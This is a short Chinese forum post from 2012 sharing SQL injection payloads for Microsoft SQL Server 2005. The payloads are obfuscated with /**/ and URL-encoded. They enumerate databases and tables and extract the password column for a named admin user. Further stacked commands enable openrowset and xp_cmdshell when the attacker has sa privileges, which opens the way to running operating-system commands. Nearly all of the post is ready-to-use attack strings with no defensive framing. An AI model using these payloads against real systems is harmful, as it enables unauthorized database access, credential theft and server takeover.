找回密码
 立即注册
查看: 3168|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; G( K- t) {( v3 K' S
3 ?7 _7 j* F  E& k3 A# s
! \4 h6 G( v* _; ^  B, r/ S" v, i[Copy to clipboard]CODE:. u! J- |9 k& `  Z& m. T
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--" S! Y3 }' j- r
: \3 Y" U. m3 i9 o# f
爆表语句,somedb部份是所要列的数据库,红色数字1累加5 I: ~7 M1 n( R8 s- |

4 F) t2 o0 ?. `9 N' I9 ]" }; k; x! h$ z$ D. _& }  k
[Copy to clipboard]CODE:* V4 p) ]: S  o  l2 d
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
4 j$ T( J! z6 P1 F" F8 m7 e: x' g) N" Q3 f7 ]* M
爆字段语句,爆表admin里user='icerover'的密码段
7 Q/ a2 c. o" p$ U( @# K* b6 O$ [8 z0 l7 c( h- `# e
* @7 U. k, T  C/ U" O% _
[Copy to clipboard]CODE:; r5 J0 w# p/ [8 M  ^1 C: {6 [$ |
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
: W9 g2 ?6 d) w, g
4 q4 X, I' g; ^- T# p) W' ~mssql2005默认没有开xp_cmdshell的,openrowset也不能用
4 E. u0 Y9 G9 e4 \: j如果是sa权限,可以这样来开启3 W; R2 x5 D* r/ X1 w
开启openrowset! n3 M1 J2 W5 F4 h6 y4 v/ F

+ H; l. I9 D! F; x" p- b7 q) ?% q3 @, ]7 [: N7 c( K! k+ @2 V+ }
[Copy to clipboard]CODE:
1 l; W' t* K! c; A7 c0 A+ Z: }) A4 Z/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
! L4 ~9 l# y% m& V4 q& n/ J3 r7 P/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
6 }, p8 \6 `0 j6 {$ E3 U
, P" H/ m2 s; X2 x+ ^. ~开启xp_cmdshell" C; {4 r1 A2 `: R+ _' \. D

) }1 r* T# I$ j7 h6 T2 H% E- s7 Y
[Copy to clipboard]CODE:  [' {5 {" f- ?: U* d" i4 M- X
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--9 Y( K, t, o+ C: j# T0 E  ~$ N
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
) H5 r, d. I6 v; C! Q* g9 t1 j; X1 i: l$ t: G9 X
ok,over~~晚安) s0 {( K" ^+ \: c8 a  d) q1 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表